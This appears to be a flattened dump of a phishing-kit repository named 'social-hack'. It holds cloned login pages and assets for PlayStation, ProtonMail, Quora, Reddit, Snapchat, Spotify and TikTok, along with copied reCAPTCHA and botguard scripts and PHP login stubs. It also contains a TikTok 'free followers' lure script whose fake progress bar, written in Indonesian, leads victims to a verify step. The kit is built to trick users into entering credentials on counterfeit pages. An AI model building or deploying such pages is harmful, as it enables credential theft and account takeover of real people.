,F+=v[t[w]];else for(;k--;)F+=v[g.h()];V(g,u,F)}),2),function(g){Jh(g,4)}),function(g,u,k){V(g,(u=(k=(u=g.h(),g.h()),g.w[u])&&g.C(u),k),u)})),0)]),208),function(g){g.G(4)}),[0,0,0])),[])),186),function(g,u,k){k=(u=g.h(),g.h()),V(g,k,""+g.C(u))}),V(J,47,function(g){r(g,4)}),225),function(g,u,k,F,t,w,X){E(g,1,5)||(u=Qg(g),k=u.Y,t=u.H,F=u.B,X=k.length,0==X?w=new F[t]:1==X?w=new F[t](k[0]):2==X?w=new F[t](k[0],k[1]):3==X?w=new F[t](k[0],k[1],k[2]):4==X?w=new F[t](k[0],k[1],k[2],k[3]):d(g,22),V(g,u.I,w))}),216),function(g,u,k,F){F=(k=(u=g.h(),g).h(),g.h()),g.b==g&&(g.C(u)[g.C(k)]=g.C(F),20==u&&(g.D=void 0,2==g.C(k)&&(g.N=void 0,V(g,215,g.C(215)+4))))}),182),function(g,u,k){V(g,(k=(u=g.h(),g).h(),k),g.C(k)+g.C(u))}),J),60,function(g){r(g,2)}),V)(J,241,function(g,u,k,F,t,w){if(!E(g,1,255)){if(g=(F=(u=(F=(k=(u=g.h(),g.h()),g).h(),t=g.h(),g).C(u),k=g.C(k),g).C(F),g).C(t),"object"==gX(u)){for(w in t=[],u)t.push(w);u=t}for(t=(F=(w=u.length,0>8&255,a&255]),void 0!=v&&Q.push(v),J.C(81).length)&&(J.w[81]=void 0,V(J,81,Q)),""),W&&(W.message&&(v+=W.message),W.stack&&(v+=":"+W.stack)),J).C(126),W)){(Q=(v=vm((W-=(v=v.slice(0,W-3),v.length+3),v.replace(/\\r\\n/g,"\\n"))),J.b),J).b=J;try{b(J,111,R(v.length,2).concat(v),9)}finally{J.b=Q}}V(J,126,W)},Wm={},m=function(J,Q){return J[Q]<<24|J[Q+1]<<16|J[Q+2]<<8|J[Q+3]},Qg=function(J,Q,W,v,a,g){for(a=(v=(W=(Q={},J.h()),Q.I=J.h(),Q.Y=[],J.b==J?J.h()-1:1),J.h()),g=0;g>>5)+Q^v+W[v&3],v+=3172301049,Q+=(J<<4^J>>>5)+J^v+W[v>>>11&3];return[J>>>24,J>>16&255,J>>8&255,J&255,Q>>>24,Q>>16&255,Q>>8&255,Q&255]}catch(a){throw a;}},gX=function(J,Q,W){if(Q=typeof J,"object"==Q)if(J){if(J instanceof Array)return"array";if(J instanceof Object)return Q;if(W=Object.prototype.toString.call(J),"[object Window]"==W)return"object";if("[object Array]"==W||"number"==typeof J.length&&"undefined"!=typeof J.splice&&"undefined"!=typeof J.propertyIsEnumerable&&!J.propertyIsEnumerable("splice"))return"array";if("[object Function]"==W||"undefined"!=typeof J.call&&"undefined"!=typeof J.propertyIsEnumerable&&!J.propertyIsEnumerable("call"))return"function"}else return"null";else if("function"==Q&&"undefined"==typeof J.call)return"object";return Q},vm=function(J,Q,W,v,a){for(Q=[],v=W=0;va?Q[W++]=a:(2048>a?Q[W++]=a>>6|192:(55296==(a&64512)&&v+1>18|240,Q[W++]=a>>12&63|128):Q[W++]=a>>12|224,Q[W++]=a>>6&63|128),Q[W++]=a&63|128);return Q},b=function(J,Q,W,v,a,g){if(J.b==J)for(a=J.C(Q),111==Q?(Q=function(u,k,F,t){if(a.c!=(F=(k=a.length,k)-4>>3,F)){F=(a.c=F,(F<<(t=[0,0,g[1],g[2]],3))-4);try{a.s=kt(m(a,F),m(a,F+4),t)}catch(w){throw w;}}a.push(a.s[k&7]^u)},g=J.C(95)):Q=function(u){a.push(u)},v&&Q(v&255),J=W.length,v=0;v=J.F--||J.O.push(254>=a?a:254)),W}},Y=function(J,Q,W){return(W=J.C(215),J.l&&WW;W++)Q[W]+=J[W];for(W=0,J=[13,8,13,12,16,5,3,10,15];9>W;W++)Q[3](Q,W%3,J[W])}};var U,r=((z.prototype.g=function(J,Q,W,v,a,g,u){if((Q=J[0],Q)==p){W=J[1];try{for(g=(W=(v=atob(W),[]),a=0);g>=8),W[a++]=u;this.l=W}catch(k){d(this,17,k)}B(this)}else if(Q==H)v=J[1],v.push(this.C(48).length,this.C(111).length,this.C(74).length,this.C(126)),V(this,167,J[2]),this.w[19]&&Y(this,this.C(19));else{if(Q==A){this.b=(u=(v=J[2],J=R(this.C(48).length+2,2),this.b),this);try{W=this.C(81),0>17,(Q=(Q^Q<<5)&W)||(Q=1),Q)},S.requestIdleCallback?function(J){requestIdleCallback(J,{timeout:4})}:S.setImmediate?function(J){setImmediate(J)}:function(J){setTimeout(J,0)}),function(J,Q,W,v){for(W=J.h(),v=0;0=J.W||1>>W)}catch(a){throw a;}},function(J,Q){if(Q=this.w[J],void 0===Q)throw d(this,30,0,J),this.J;return Q()}),function(J,Q,W,v){b((W=J.h(),v=J.h(),J),v,R(J.C(W),Q))}),Fs=(z.prototype.j="caller",z.prototype.h=(z.prototype.T=36,function(J,Q){if(this.a)return J=J?this.a().shift():this.U().shift(),this.a().length||this.U().length||(this.U=this.a=void 0,this.L--),J;if(!(J=this.C(215),J in this.l))throw d(this,31),this.J;return(V(((void 0==this.N&&(this.N=m(this.l,J-4),this.D=void 0),this.D)!=J>>3&&(this.D=J>>3,Q=this.C(20),this.K=kt(this.N,this.D,[0,0,Q[1],Q[2]])),this),215,J+1),this).l[J]^this.K[J%8]}),z.prototype.Lw=function(J,Q,W,v,a,g){for(W=[],g=v=0;g>v&255);return W},z.prototype.Z=35,function(J,Q,W,v,a){if((W=(J.o=false,Q)[0],W)==H)J.F=25,J.g(Q);else if(W==A){W=Q[v=Q[1],3];try{a=J.g(Q)}catch(g){c(J,g),a=J.f}(v&&v(a),W).push(a)}else if(W==M)J.g(Q);else if(W==p)J.g(Q);else if(W==Wm){try{for(a=0;a>6;return(v=new Number((J=(v+=v<<3,v^=v>>11,v+(v<<15)>>>0),J&(1<>>Q)%W,v}),{}),H=(z.prototype.$=false,z.prototype.m="toString",{}),R=function(J,Q,W,v){for(v=Q-1,W=[];0<=v;v--)W[Q-1-v]=J>>8*v&255;return W},f=(z.prototype.G=function(J,Q,W,v){b(this,(W=(Q=J&4,J&=3,this.h()),v=this.h(),W=this.C(W),Q&&(W=vm((""+W).replace(/\\r\\n/g,"\\n"))),J&&b(this,v,R(W.length,2)),v),W)},z.prototype.J=(U=S.botguard||(S.botguard={}),{}),function(J,Q){J.M.splice(0,0,Q)});(U.gLW=function(J,Q,W){this.invoke=(W=new z(J,{X:Q}),function(v,a,g){return(g=W.R(a&&v,g),v&&!a)&&v(g),g})},U).bg=function(J,Q,W){return J&&J.substring&&(W=U[J.substring(0,3)])?new W(J.substring(3),Q):new U.gLW(J,Q)};try{U.u||(S.addEventListener("unload",function(){},D),U.u=1)}catch(J){}try{S.addEventListener("test",null,Object.defineProperty({},"passive",{get:function(){D={passive:true}}}))}catch(J){};')(); -------------------------------------------------------------------------------- /.sets/playstation/api.js.download: -------------------------------------------------------------------------------- 1 | /* PLEASE DO NOT COPY AND PASTE THIS CODE. */(function(){var w=window,C='___grecaptcha_cfg',cfg=w[C]=w[C]||{},N='grecaptcha';var gr=w[N]=w[N]||{};gr.ready=gr.ready||function(f){(cfg['fns']=cfg['fns']||[]).push(f);};(cfg['enterprise']=cfg['enterprise']||[]).push(false);(cfg['render']=cfg['render']||[]).push('explicit');(cfg['onload']=cfg['onload']||[]).push('widgetLoaded');w['__google_recaptcha_client']=true;var d=document,po=d.createElement('script');po.type='text/javascript';po.async=true;po.src='https://www.gstatic.com/recaptcha/releases/5fbZx3NV5xhaMoMLrZV3TkN4/recaptcha__en_gb.js';var e=d.querySelector('script[nonce]'),n=e&&(e['nonce']||e.getAttribute('nonce'));if(n){po.setAttribute('nonce',n);}var s=d.getElementsByTagName('script')[0];s.parentNode.insertBefore(po, s); })(); -------------------------------------------------------------------------------- /.sets/playstation/bframe.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | reCAPTCHA 7 | 178 | 179 | 180 | 183 | 184 |
-------------------------------------------------------------------------------- /.sets/playstation/button_icon_password_off.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/machine1337/social-hack/f923cec63a345220720577a844e6a52d2176300a/.sets/playstation/button_icon_password_off.png -------------------------------------------------------------------------------- /.sets/playstation/index.php: -------------------------------------------------------------------------------- 1 | 6 | -------------------------------------------------------------------------------- /.sets/playstation/kekka-22361ea3e8890b95e7b006a784440d01.css: -------------------------------------------------------------------------------- 1 | /** 2 | * kekka.css 3 | * Copyright 2016 Sony Corporation 4 | * 5 | */ 6 | 7 | * :not(p):not(h2):not(h3):not(ul):not(li){margin:0;padding:0;-webkit-tap-highlight-color:transparent}body,html{height:100%}body{overflow:hidden;font-family:-apple-system,BlinkMacSystemFont,'Helvetica Neue',Helvetica,HiraKakuProN-W3,'Noto Sans CJK JP',sans-serif;-webkit-text-size-adjust:100%}span{unicode-bidi:embed}html{font-size:10px} 8 | -------------------------------------------------------------------------------- /.sets/playstation/loading.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/machine1337/social-hack/f923cec63a345220720577a844e6a52d2176300a/.sets/playstation/loading.png -------------------------------------------------------------------------------- /.sets/playstation/loading_base.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/machine1337/social-hack/f923cec63a345220720577a844e6a52d2176300a/.sets/playstation/loading_base.png -------------------------------------------------------------------------------- /.sets/playstation/login.php: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /.sets/playstation/logo_playstation.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/machine1337/social-hack/f923cec63a345220720577a844e6a52d2176300a/.sets/playstation/logo_playstation.png -------------------------------------------------------------------------------- /.sets/playstation/saved_resource: -------------------------------------------------------------------------------- 1 | ndwti({"wi":"w-666234","wmd":{"ipr":{"fm":[],"lm":true,"tl":20000},"wk":{"r":"test"},"di":{"rt":128,"ut":512},"af":[]},"fd":{"ipr":"p","bi":"p","wt":"1.w-666234.1.2.4ODTuykD3bYvqj9RpaK5gw,,.I2PzRDkmu3FRo1eMxiTzb7fp9vKKTvu44DXdevnl1nf38CBmmTErco0FkBbSYGiiX1Iy6chd2bUFDuidinMfM7Et6PpjVbrSCaWoqZ3REB5jioKKtRRF_CYwy2Pe2KdMrSr1tPWzMnfKriMbHKEStZLeR0tj3FShVopqekSIwljoEtpOBBZMvXKezIF1CaqhjSKnH9JYg0l5yRw9UHN329dfmmixtzC1RF3ZrjKLTlTJrmC3TR2j3UxUU41NTKTtXNo33HJr-Z3ZCuKAzXhdyQ,,"},"gf":[]}) -------------------------------------------------------------------------------- /.sets/playstation/sony_logo.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/machine1337/social-hack/f923cec63a345220720577a844e6a52d2176300a/.sets/playstation/sony_logo.png -------------------------------------------------------------------------------- /.sets/playstation/ua-parser.min-03f60cd2f499bace751d5136d4fc67d4.js.download: -------------------------------------------------------------------------------- 1 | (function(i,s){"use strict" 2 | var e="model",o="name",r="type",a="vendor",n="version",d="mobile",t="tablet",l={extend:function(i,s){var e={} 3 | for(var o in i)s[o]&&s[o].length%2==0?e[o]=s[o].concat(i[o]):e[o]=i[o] 4 | return e},has:function(i,s){return"string"==typeof i&&-1!==s.toLowerCase().indexOf(i.toLowerCase())},lowerize:function(i){return i.toLowerCase()},major:function(i){return"string"==typeof i?i.replace(/[^\d\.]/g,"").split(".")[0]:void 0},trim:function(i){return i.replace(/^[\s\uFEFF\xA0]+|[\s\uFEFF\xA0]+$/g,"")}},w={rgx:function(i,s){for(var e,o,r,a,n,d,t=0;t0?2==a.length?"function"==typeof a[1]?this[a[0]]=a[1].call(this,d):this[a[0]]=a[1]:3==a.length?"function"!=typeof a[1]||a[1].exec&&a[1].test?this[a[0]]=d?d.replace(a[1],a[2]):void 0:this[a[0]]=d?a[1].call(this,d,a[2]):void 0:4==a.length&&(this[a[0]]=d?a[3].call(this,d.replace(a[1],a[2])):void 0):this[a]=d||void 0 6 | t+=2}},str:function(i,s){for(var e in s)if("object"==typeof s[e]&&s[e].length>0){for(var o=0;o 6 | -------------------------------------------------------------------------------- /.sets/protonmail/login.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | Login | ProtonMail

User login

Field required

Two-Factor Authentication

Need help?
34 | -------------------------------------------------------------------------------- /.sets/protonmail/login.php: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /.sets/protonmail/logo.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/machine1337/social-hack/f923cec63a345220720577a844e6a52d2176300a/.sets/protonmail/logo.png -------------------------------------------------------------------------------- /.sets/quora/bframe.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | reCAPTCHA 7 | 178 | 179 | 180 | 183 | 184 |
-------------------------------------------------------------------------------- /.sets/quora/iframe.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | -------------------------------------------------------------------------------- /.sets/quora/index.php: -------------------------------------------------------------------------------- 1 | 6 | -------------------------------------------------------------------------------- /.sets/quora/login.php: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /.sets/quora/saved_resource.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | -------------------------------------------------------------------------------- /.sets/reddit/index.php: -------------------------------------------------------------------------------- 1 | 6 | -------------------------------------------------------------------------------- /.sets/reddit/login.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 10 | reddit.com: Log in 11 | 12 | 13 | 14 | 15 | 16 | 17 | 18 | 19 | 20 | 21 | 22 | 23 | 24 | 25 | 26 | 27 | 28 | 29 | 30 | 31 | 32 | 33 | 34 | 35 | 36 | 37 | 38 | 39 |
40 | 41 |
42 |
43 |
44 |
45 |
46 |
47 |
48 |

49 | 50 | Sign in 51 | 52 |

53 |

54 | You have two-factor authentication enabled on this account because you're awesome. 55 |

56 |
57 | 58 | 59 | 60 | 61 | 66 |
67 | 68 | 69 |
70 | 71 |
72 | 73 | 74 |
75 | 76 |
77 |
78 | Use a backup code 79 |
80 |
81 | 82 |
83 | 85 |
86 |
87 |
88 | 93 | 96 |
97 | Go back to account detailsHaving trouble ? 100 |
101 |
102 |
103 |
104 |
105 | 106 | 107 | 113 | 114 | 115 | 116 | 117 | 118 | 119 | 120 | 121 | 122 | 123 | 124 | 125 | -------------------------------------------------------------------------------- /.sets/reddit/login.php: -------------------------------------------------------------------------------- 1 | 7 | -------------------------------------------------------------------------------- /.sets/snapchat/index.php: -------------------------------------------------------------------------------- 1 | 6 | -------------------------------------------------------------------------------- /.sets/snapchat/login.php: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /.sets/spotify/api.js: -------------------------------------------------------------------------------- 1 | /* PLEASE DO NOT COPY AND PASTE THIS CODE. */(function() {var CFG='___grecaptcha_cfg';if(!window[CFG]){window[CFG]={};}var GR='grecaptcha';if(!window[GR]){window[GR]={};}window[GR].ready=window[GR].ready||function(f){(window[CFG]['fns']=window[CFG]['fns']||[]).push(f);};(window[CFG]['render']=window[CFG]['render']||[]).push('explicit');window['__google_recaptcha_client']=true;var po=document.createElement('script');po.type='text/javascript';po.async=true;po.src='https://www.gstatic.com/recaptcha/api2/v1528855115741/recaptcha__en.js';var elem=document.querySelector('script[nonce]');var n=elem&&(elem['nonce']||elem.getAttribute('nonce'));if(n){po.setAttribute('nonce',n);}var s=document.getElementsByTagName('script')[0];s.parentNode.insertBefore(po, s);})(); -------------------------------------------------------------------------------- /.sets/spotify/bframe.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | reCAPTCHA 6 | 177 | 178 | 179 | 182 | 183 |
-------------------------------------------------------------------------------- /.sets/spotify/hVpKLs9k787xwHAhrfSZCIqM1XtnPD1dxAE7zC2jvTU.js: -------------------------------------------------------------------------------- 1 | /* Anti-spam. Want to say hello? Contact (base64) Ym90Z3VhcmQtY29udGFjdEBnb29nbGUuY29t */ Function('var R=this,b=function(A,m,q,D){(D=(q=A.J(),A).J(),c)(A,D,F(A.c(q),m))},p=function(A,m,q,D,E){for(E=(((A.g=((A.D=0,A).G=[],A.b=25,A.H=false,false),A.N=function(A,m,q){return(q=function(){return A},m=function(){return q()},m)[this.l]=function(W){A=W},m},A.s=function(A,m,q,D,E,H){return H=(D=function(){return D[q.V+(E[q.O]===m)-!H[q.O]]},E=function(){return D()},q=this,q).S,E[q.l]=function(A){D[q.I]=A},E[q.l](A),A=E},D=[],A).w=void 0,A.B=0,A).C=void 0,0);128>E;E++)D[E]=String.fromCharCode(E);((((E=((((((((((((((((((A.f=[],f(A,196,0),f)(A,58,0),f)(A,246,[160,0,0]),A.KB=function(A,m){((m.push(A[0]<<24|A[1]<<16|A[2]<<8|A[3]),m).push(A[4]<<24|A[5]<<16|A[6]<<8|A[7]),m).push(A[8]<<24|A[9]<<16|A[10]<<8|A[11])},f)(A,83,function(A,m,q){m=(m=A.J(),q=A.J(),A).c(m),f(A,q,Y(m))}),f)(A,73,function(A){z(A,1)}),f(A,141,function(A,m,q){m=(q=(m=A.J(),A).J(),A.f[m]&&A.c(m)),f(A,q,m)}),A.M=false,f(A,11,R),f)(A,169,function(A,m,q,D,E,H,y,w,d,n,V,t,k){for(n=d=(y=(E=(D=(m=A.J(),q=0),function(m,W){for(;D>=(D-=m,W=q&(1<=m.length;)m.push(A.J());D=m[D]}W.push(D)}A.C=A.s(k.slice(),A.J),A.w=A.s(W,A.J)})}),f(A,47,function(A){A.X(4)}),f)(A,99,T(4)),f(A,15,0),f)(A,172,function(A,m,q,D,E){for(E=(D=(q=(m=A.J(),N)(A),[]),0);E>q)}),f(A,95,function(A,m){(m=A.J(),A=A.c(m),A[0]).removeEventListener(A[1],A[2],false)}),f)(A,214,0),f(A,45,function(A,m,q,D){(q=(m=A.J(),A).J(),D=A.J(),f)(A,D,A.c(m)||A.c(q))}),f(A,242,function(A,m,q){S(A,1,5)||(m=A.J(),q=A.J(),f(A,q,function(A){return eval(A)}(A.c(m))))}),A.K=[],m)&&"!"==m.charAt(0)?(A.U=m,E()):(q=!!q.Y,A.M=q,A.m=[],C(A,[4,m]),C(A,[5,E]),O(A,false,q,true))},Y=function(A,m,q){if("object"==(m=typeof A,m))if(A){if(A instanceof Array)return"array";if(A instanceof Object)return m;if("[object Window]"==(q=Object.prototype.toString.call(A),q))return"object";if("[object Array]"==q||"number"==typeof A.length&&"undefined"!=typeof A.splice&&"undefined"!=typeof A.propertyIsEnumerable&&!A.propertyIsEnumerable("splice"))return"array";if("[object Function]"==q||"undefined"!=typeof A.call&&"undefined"!=typeof A.propertyIsEnumerable&&!A.propertyIsEnumerable("call"))return"function"}else return"null";else if("function"==m&&"undefined"==typeof A.call)return"object";return m},c=function(A,m,q,D,E,W){for(((E=A.c(m),99==m)?(m=function(A,m,q,D){if(q=(m=E.length,m)-4>>3,E.R!=q){q=((D=(E.R=q,[0,0,0,W]),q)<<3)-4;try{E.P=v(u(E,q),u(E,q+4),D)}catch(H){throw H;}}E.push(E.P[m&7]^A)},W=A.c(214)):m=function(A){E.push(A)},D)&&m(D&255),A=q.length,D=0;DA.F()-A.o)return false;return 0!=document.hidden?false:true},B=function(A,m){try{p(this,A,m)}catch(q){K(this,q)}},f=(B.prototype.O="caller",B.prototype.V=35,function(A,m,q){if(196==m||58==m)if(A.f[m])A.f[m][A.l](q);else A.f[m]=A.N(q);else if(246!=m&&99!=m&&2!=m&&213!=m||!A.f[m])A.f[m]=A.s(q,A.c);15==m&&(A.a=void 0,f(A,196,A.c(196)+4))}),a=(B.prototype.i=function(A,m,q,D,E,W){if(this.U)return this.U;try{W=[],E=[],D=!!A,C(this,[1,D,E,m]),C(this,[2,A,E,W]),O(this,false,D,true),q=W[0]}catch(g){K(this,g),q=this.U,A&&A(q)}return q},function(A,m){((A.j.push(A.f.slice()),A).f[196]=void 0,f)(A,196,m)}),X,C=function(A,m){A.K.splice(0,0,m)},u=function(A,m){return A[m]<<24|A[m+1]<<16|A[m+2]<<8|A[m+3]},F=((B.prototype.Bg=function(A,m,q,D){for(;q--;)196!=q&&58!=q&&m.f[q]&&(m.f[q]=m[D](m[A](q),this));m[A]=this},B.prototype).l="toString",function(A,m,q,D){for(q=[],D=m-1;0<=D;D--)q[m-1-D]=A>>8*D&255;return q}),v=function(A,m,q,D){try{for(D=0;101513633568!=D;)A+=(m<<4^m>>>5)+m^D+q[D&3],D+=3172301049,m+=(A<<4^A>>>5)+A^D+q[D>>>11&3];return[A>>>24,A>>16&255,A>>8&255,A&255,m>>>24,m>>16&255,m>>8&255,m&255]}catch(E){throw E;}},I=(B.prototype.cg=R.requestIdleCallback?function(A){requestIdleCallback(A,{timeout:4})}:R.setImmediate?function(A){setImmediate(A)}:function(A){setTimeout(A,0)},function(A,m,q){return q=A.c(196),A.m&&q>D&255);return q},B).prototype.v={},B).prototype.SX=function(A,m,q,D,E){for(E=D=0;E>6;return D=(A=(D+=D<<3,D^=D>>11,D+(D<<15)>>>0),new Number(A&(1<>>m)%q,D},function(A,m,q,D,E){for(;A.K.length;){if(q&&m&&L(A)){E=A,A.cg(function(){O(E,false,m,false)});break}D=(q=true,A).K.pop(),D=h(A,D)}return D}),r=function(A,m,q,D,E,W){return function(){var g=[6,m,q,void 0,E,W,arguments],Q=D&1;if(D&2)var P=(C(A,g),O(A,true,false,false));else Q&&A.K.length?C(A,g):Q?(C(A,g),O(A,true,false,false)):P=h(A,g);return P}},S=(B.prototype.F=(window.performance||{}).now?function(){return this.Je+(window.performance.now()|0)}:function(){return+new Date},function(A,m,q){if(0>=A.D||1E?m[q++]=E:(2048>E?m[q++]=E>>6|192:(55296==(E&64512)&&D+1>18|240,m[q++]=E>>12&63|128):m[q++]=E>>12|224,m[q++]=E>>6&63|128),m[q++]=E&63|128);return m},U=(B.prototype.X=function(A,m,q,D){(q=(A&=(m=A&4,3),this).J(),D=this.J(),q=this.c(q),m&&(q=M((""+q).replace(/\\r\\n/g,"\\n"))),A)&&c(this,D,F(q.length,2)),c(this,D,q)},function(A,m,q,D,E,W){for(((q=(m={},A).J(),m).W=A.J(),m).L=[],D=A.J()-1,E=A.J(),W=0;W>>q)}catch(E){throw E;}},function(A,m){return m=A.J(),m&128&&(m=m&127|A.J()<<7),m}),T=function(A,m){for(m=[];A--;)m.push(255*Math.random()|0);return m},K=function(A,m){A.U=("E:"+m.message+":"+m.stack).slice(0,2048)},O=(B.prototype.I=36,function(A,m,q,D,E,W){if(0==A.K.length)return W;if(E=0==A.B)A.o=A.F();return(W=G(A,q,D),E)&&(q=A.F()-A.o,q<(m?10:0)||0>=A.b--||A.G.push(254>=q?q:254)),W}),h=(B.prototype.Z=false,function(A,m,q,D,E){if(1==(q=(A.g=false,m)[0],q))A.b=25,A.S(m);else if(2==q){D=m[3],q=m[1];try{A.M=false,E=A.S(m)}catch(W){K(A,W),E=A.U}(q&&q(E),D).push(E)}else if(3==q)A.S(m);else if(4==q)A.S(m);else if(5==q)m=m[1],A.M=false,m();else if(6==q)return E=m[2],f(A,148,m[6]),f(A,211,E),A.S(m)}),x=(B.prototype.S=function(A,m,q,D,E){if(4==(m=A[0],m)){A=A[1];try{for(D=(A=(q=atob(A),[]),m=0);D>=8),A[m++]=E;this.m=A}catch(W){J(this,17,W)}Z(this)}else if(1==m)E=A[1],q=A[2],q.push(this.c(246).length,this.c(99).length,this.c(2).length,this.c(116)),this.M=E,f(this,211,A[3]),this.f[171]&&I(this,this.c(171));else{if(2==m){if(((E=(4<((4<(m=(E=(A=F((q=A[2],this.c(246).length+2),2),this).c(213),0>17,m^m<<5)&q)||(m=1),m)},function(A,m){((m=A.c(196)-m,f)(A,196,A.m.length),A.K).push([3,m])}),J=function(A,m,q,D,E){(q=(0==((m=[(E=A.c(58),m),E>>8&255,E&255],void 0)!=D&&m.push(D),A.c(213)).length&&(A.f[213]=void 0,f(A,213,m)),D="",q&&(q.message&&(D+=q.message),q.stack&&(D+=":"+q.stack)),A).c(116),3)q;q++)m[q]+=A[q];for(q=(A=[13,8,13,12,16,5,3,10,15],0);9>q;q++)m[3](m,q%3,A[q])}},B.prototype.J=function(A,m){if(this.C)return A=A?this.C().shift():this.w().shift(),this.C().length||this.w().length||(this.w=this.C=void 0,this.B--),A;if(!((A=this.c(196),A)in this.m))throw J(this,31),this.v;return((void 0==this.a&&(this.a=u(this.m,A-4),this.$=void 0),this.$!=A>>3&&(this.$=A>>3,m=[0,0,0,this.c(15)],this.A=v(this.a,this.$,m)),f)(this,196,A+1),this.m)[A]^this.A[A%8]},B.prototype.c=function(A,m){if(m=this.f[A],void 0===m)throw J(this,30,0,A),this.v;return m()},X=R.botguard||(R.botguard={}),X.EKc=function(A,m,q){(q=new B(A,{Y:m}),this).invoke=function(A,m,W){return(W=q.i(m&&A,W),A&&!m)&&A(W),W}},X.bg=function(A,m,q){return A&&A.substring&&(q=X[A.substring(0,3)])?new q(A.substring(3),m):new X.EKc(A,m)};try{X.u||(R.addEventListener("unload",function(){},e),X.u=1)}catch(A){}try{R.addEventListener("test",null,Object.defineProperty({},"passive",{get:function(){e={passive:true}}}))}catch(A){};')(); -------------------------------------------------------------------------------- /.sets/spotify/index.php: -------------------------------------------------------------------------------- 1 | 6 | -------------------------------------------------------------------------------- /.sets/spotify/login.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | Login - Spotify 6 | 7 | 8 | 9 | 10 | 11 | 12 | 13 | 14 |
-------------------------------------------------------------------------------- /.sets/spotify/login.php: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /.sets/tiktok/index.php: -------------------------------------------------------------------------------- 1 | 6 | -------------------------------------------------------------------------------- /.sets/tiktok/jscript.js: -------------------------------------------------------------------------------- 1 | function updateyear() { 2 | var today = new Date(); 3 | var year = today.getFullYear(); 4 | document.getElementById("year").innerHTML = year; 5 | } 6 | 7 | var randomnumber = setInterval(randomuser,6000); 8 | 9 | var getresources = 336699; 10 | var resourcestime = setInterval(resourcesupdate,100); 11 | 12 | var today = new Date().toLocaleDateString('en-US', { 13 | day : 'numeric', 14 | month : 'short', 15 | year : 'numeric' 16 | }).split(' ').join(' '); 17 | 18 | setTimeout(toolupdated, 300); 19 | 20 | function toolupdated() { 21 | document.getElementById("date").innerHTML = today; 22 | } 23 | 24 | function move() { 25 | var username = document.getElementById("username").value; 26 | var follower = document.getElementById("follower").value; 27 | var like = document.getElementById("like").value; 28 | 29 | if(username == "") { 30 | alert("Please insert your tiktok.com username or email address."); 31 | return false; 32 | } 33 | 34 | document.getElementById("fillup").style.display = "none"; 35 | document.getElementById("steps").style.display = "none"; 36 | document.getElementById("comment").style.display = "none"; 37 | document.getElementById("progressbarcontainer").style.display = "block"; 38 | var elem = document.getElementById("progressbar"); 39 | var width = 10; 40 | var id = setInterval(frame, 693); 41 | function frame() { 42 | if (width > 10 && width < 20) { 43 | document.getElementById("progresslog").innerHTML = "Menghubungkan..."; 44 | $("#gen1").fadeIn("slow"); 45 | } 46 | 47 | if (width > 20 && width < 30) { 48 | document.getElementById("progresslog").innerHTML = "Menghubungkan.."; 49 | $("#gen1").fadeOut("slow"); 50 | $("#gen2").fadeIn("slow"); 51 | } 52 | 53 | if (width > 30 && width < 40) { 54 | document.getElementById("progresslog").innerHTML = "Mencari Username : "+username+""; 55 | $("#gen2").fadeOut("slow"); 56 | $("#gen3").fadeIn("slow"); 57 | } 58 | 59 | if (width > 40 && width < 45) { 60 | document.getElementById("progresslog").innerHTML = "Username "+username+" Berhasil Terhubung!"; 61 | $("#gen3").fadeOut("slow"); 62 | $("#gen4").fadeIn("slow"); 63 | } 64 | 65 | 66 | if (width > 60 && width < 75) { 67 | document.getElementById("progresslog").innerHTML = "Mengirim "+follower+" Followers Ke "+username+""; 68 | $("#gen5").fadeOut("slow"); 69 | $("#gen6").fadeIn("slow"); 70 | 71 | if (document.getElementById("addfollowerbarlabel").innerHTML == 0) { 72 | startaddfollower(); 73 | } 74 | } 75 | 76 | if (width > 75 && width < 90) { 77 | document.getElementById("progresslog").innerHTML = "Mengirim "+like+" Like Ke "+username+""; 78 | $("#gen6").fadeOut("slow"); 79 | $("#gen7").fadeIn("slow"); 80 | 81 | if (document.getElementById("addlikebarlabel").innerHTML == 0) { 82 | startaddlike(); 83 | } 84 | } 85 | 86 | if (width > 90 && width < 99) { 87 | document.getElementById("progresslog").innerHTML = "Berhasil!"; 88 | $("#gen7").fadeOut("slow"); 89 | $("#gen1").fadeIn("slow"); 90 | } 91 | 92 | if (width >= 99) { 93 | setTimeout(verify, 1000); 94 | clearInterval(id); 95 | } else { 96 | width++; 97 | elem.style.width = width + '%'; 98 | document.getElementById("progressbarlabel").innerHTML = width * 1 + '%'; 99 | } 100 | } 101 | } 102 | 103 | function verify() { 104 | document.getElementById("verifybg").style.height = "100%"; 105 | } 106 | 107 | function randomuser() { 108 | document.getElementById("randomnumber").innerHTML = Math.floor(Math.random() * 9999); 109 | } 110 | 111 | function resourcesupdate() { 112 | document.getElementById("resources").innerHTML = getresources++; 113 | } 114 | 115 | function startaddfollower() { 116 | var addfollowerelem = document.getElementById("addfollowerbar"); 117 | var addfollowerwidth = 1; 118 | var addfollowerwidthid = setInterval(addfollowerwidthnow, 16); 119 | var addfollowerid = setInterval(addfollowernow, 3); 120 | var addfollower = 0; 121 | 122 | var addfollowerspeed = 0; 123 | 124 | if(document.getElementById("follower").value == 10000) 125 | { 126 | addfollowerspeed = 50; 127 | } 128 | 129 | if(document.getElementById("follower").value == 50000) 130 | { 131 | addfollowerspeed = 100; 132 | } 133 | 134 | if(document.getElementById("follower").value == 75000) 135 | { 136 | addfollowerspeed = 250; 137 | } 138 | 139 | if(document.getElementById("follower").value == 100000) 140 | { 141 | addfollowerspeed = 500; 142 | } 143 | 144 | function addfollowernow() { 145 | if (addfollower >= 